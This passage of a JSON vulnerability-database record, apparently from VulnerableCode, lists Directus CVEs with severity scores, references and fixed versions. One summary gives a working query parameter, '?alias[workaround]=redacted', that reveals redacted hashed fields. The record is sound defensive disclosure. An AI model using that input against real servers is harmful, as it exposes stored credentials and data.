"value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:45:18Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v11.9.0" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/378353?format=api", "purl": "pkg:npm/directus@11.9.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.9.0" } ], "aliases": [ "CVE-2025-53887", "GHSA-rmjh-cf9q-pv7q" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-rren-vtar-23fm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49725?format=api", "vulnerability_id": "VCID-s39d-aw92-hydh", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. A user with permission to view any collection using redacted hashed fields can get access to the raw stored version using the `alias` functionality on the API. 
Normally, these redacted fields will return `**********` however if we change the request to `?alias[workaround]=redacted` we can instead retrieve the plain text value for the field. This can be avoided by removing permission to view the sensitive fields entirely from users or roles that should not be able to see them. This vulnerability is fixed in 10.11.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-34708", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00324", "scoring_system": "epss", "scoring_elements": "0.55944", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00324", "scoring_system": "epss", "scoring_elements": "0.55942", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00324", "scoring_system": "epss", "scoring_elements": "0.55821", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00324", "scoring_system": "epss", "scoring_elements": "0.55957", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-34708" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34708", "reference_id": "CVE-2024-34708", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34708" }, { "reference_url": "https://github.com/directus/directus/commit/e70a90c267bea695afce6545174c2b77517d617b", "reference_id": "e70a90c267bea695afce6545174c2b77517d617b", 
"reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-15T15:21:26Z/" } ], "url": "https://github.com/directus/directus/commit/e70a90c267bea695afce6545174c2b77517d617b" }, { "reference_url": "https://github.com/advisories/GHSA-p8v3-m643-4xqx", "reference_id": "GHSA-p8v3-m643-4xqx", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-p8v3-m643-4xqx" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-p8v3-m643-4xqx", "reference_id": "GHSA-p8v3-m643-4xqx", "reference_type": "", "scores": [ { "value": "4.9", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-15T15:21:26Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-p8v3-m643-4xqx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/31010?format=api", "purl": "pkg:npm/directus@10.11.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": 
"VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jtg3-4cp8-8fe6" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.11.0" } ], "aliases": [ "CVE-2024-34708", "GHSA-p8v3-m643-4xqx" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-s39d-aw92-hydh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90555?format=api", "vulnerability_id": "VCID-tp8r-hnf7-fkaf", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. An observable difference in error messaging was found in the Directus REST API in versions of Directus prior to version 11.13.0. 
The `/items/{collection}` API returns different error messages for two cases: when a user tries to access an existing collection which they are not authorized to access, and when a user tries to access a non-existing collection. The two differing error messages leak the existence of collections to users who are not authorized to access these collections. Version 11.13.0 fixes the issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-64749", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00049", "scoring_system": "epss", "scoring_elements": "0.15725", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00049", "scoring_system": "epss", "scoring_elements": "0.15744", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00049", "scoring_system": "epss", "scoring_elements": "0.15606", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00049", "scoring_system": "epss", "scoring_elements": "0.15758", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-64749" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64749", "reference_id": "CVE-2025-64749", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64749" }, { "reference_url": "https://github.com/directus/directus/commit/f99c9b89071f9d136cc9b0d0c182f2d24542bc31", "reference_id": 
"f99c9b89071f9d136cc9b0d0c182f2d24542bc31", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-14T17:14:48Z/" } ], "url": "https://github.com/directus/directus/commit/f99c9b89071f9d136cc9b0d0c182f2d24542bc31" }, { "reference_url": "https://github.com/advisories/GHSA-cph6-524f-3hgr", "reference_id": "GHSA-cph6-524f-3hgr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cph6-524f-3hgr" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-cph6-524f-3hgr", "reference_id": "GHSA-cph6-524f-3hgr", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-14T17:14:48Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-cph6-524f-3hgr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/35193?format=api", "purl": "pkg:npm/directus@11.13.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": 
"VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0" } ], "aliases": [ "CVE-2025-64749", "GHSA-cph6-524f-3hgr" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-tp8r-hnf7-fkaf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/145868?format=api", "vulnerability_id": "VCID-u121-7x5t-3fcg", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Instances relying on an allow-listed reset URL are vulnerable to an HTML injection attack through the use of query parameters in the reset URL. An attacker could exploit this to email users URLs that point to the server's domain but may contain malicious code. The problem has been resolved and released under version 9.23.0. People relying on a custom password reset URL should upgrade to 9.23.0 or later, or remove the custom reset URL from the configured allow list. Users are advised to upgrade. 
Users unable to upgrade may disable the custom reset URL allow list as a workaround.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-27474", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00828", "scoring_system": "epss", "scoring_elements": "0.75025", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00828", "scoring_system": "epss", "scoring_elements": "0.75035", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00828", "scoring_system": "epss", "scoring_elements": "0.75038", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00828", "scoring_system": "epss", "scoring_elements": "0.74955", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-27474" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27474", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27474" }, { "reference_url": "https://github.com/directus/directus/issues/17119", "reference_id": "17119", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": 
"Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/" } ], "url": "https://github.com/directus/directus/issues/17119" }, { "reference_url": "https://github.com/directus/directus/pull/17120", "reference_id": "17120", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/" } ], "url": "https://github.com/directus/directus/pull/17120" }, { "reference_url": "https://github.com/advisories/GHSA-4hmq-ggrm-qfc6", "reference_id": "GHSA-4hmq-ggrm-qfc6", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4hmq-ggrm-qfc6" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-4hmq-ggrm-qfc6", "reference_id": "GHSA-4hmq-ggrm-qfc6", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-4hmq-ggrm-qfc6" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/32456?format=api", "purl": 
"pkg:npm/directus@9.23.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-f3pv-2cf5-3bg8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/393033?format=api", "purl": "pkg:npm/directus@9.23.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-b8ya-2bmn-e3h5" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-eyv5-91cq-pyf9" }, { "vulnerability": "VCID-f3pv-2cf5-3bg8" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jvtg-cnnb-7ubg" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u4er-eddz-g7aq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": 
"VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.1" } ], "aliases": [ "CVE-2023-27474", "GHSA-4hmq-ggrm-qfc6" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u121-7x5t-3fcg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/55644?format=api", "vulnerability_id": "VCID-u4er-eddz-g7aq", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 10.8.3, the exact Directus version number was being shipped in compiled JS bundles which are accessible without authentication. With this information a malicious attacker can trivially look for known vulnerabilities in Directus core or any of its shipped dependencies in that specific running version. 
The problem has been resolved in versions 10.8.3 and newer.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27296", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00437", "scoring_system": "epss", "scoring_elements": "0.63634", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00437", "scoring_system": "epss", "scoring_elements": "0.63623", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00437", "scoring_system": "epss", "scoring_elements": "0.63521", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00437", "scoring_system": "epss", "scoring_elements": "0.63637", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-27296" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/commit/a5a1c26ac48795ed3212a4c51b9523588aff4fa0", "reference_id": "a5a1c26ac48795ed3212a4c51b9523588aff4fa0", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-01T19:28:33Z/" } ], "url": "https://github.com/directus/directus/commit/a5a1c26ac48795ed3212a4c51b9523588aff4fa0" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27296", "reference_id": "CVE-2024-27296", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27296" }, { "reference_url": "https://github.com/advisories/GHSA-5mhg-wv8w-p59j", "reference_id": "GHSA-5mhg-wv8w-p59j", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5mhg-wv8w-p59j" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-5mhg-wv8w-p59j", "reference_id": "GHSA-5mhg-wv8w-p59j", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-01T19:28:33Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-5mhg-wv8w-p59j" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/29477?format=api", "purl": "pkg:npm/directus@10.8.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": 
"VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.8.3" } ], "aliases": [ "CVE-2024-27296", "GHSA-5mhg-wv8w-p59j" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u4er-eddz-g7aq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71570?format=api", "vulnerability_id": "VCID-u5hw-p46t-jybc", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, Directus' TUS resumable upload endpoint (/files/tus) allows any authenticated user with basic file upload permissions to overwrite arbitrary existing files by UUID. The TUS controller performs only collection-level authorization checks, verifying the user has some permission on directus_files, but never validates item-level access to the specific file being replaced. 
As a result, row-level permission rules (e.g., \"users can only update their own files\") are completely bypassed via the TUS path while being correctly enforced on the standard REST upload path. This vulnerability is fixed in 11.16.1.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35412", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02422", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02424", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03648", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03634", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35412" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35412", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35412" }, { "reference_url": "https://github.com/advisories/GHSA-qqmv-5p3g-px89", "reference_id": "GHSA-qqmv-5p3g-px89", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qqmv-5p3g-px89" }, { "reference_url": 
